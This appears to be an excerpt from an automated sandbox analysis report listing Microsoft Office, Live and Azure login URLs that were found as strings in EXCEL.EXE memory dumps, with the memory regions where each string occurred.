Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeecheJ$
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://lifecycle.office.comP
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://lifecycle.office.comx
Source: EXCEL.EXE, 00000000.00000003.488765377.000000001663E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489495627.000000001664B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizes
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://login.windows.local
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3Jr
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize#
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize$
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize%
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize&
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize)
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize-
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize2
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize3
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize4
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize5
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize7
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize:
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
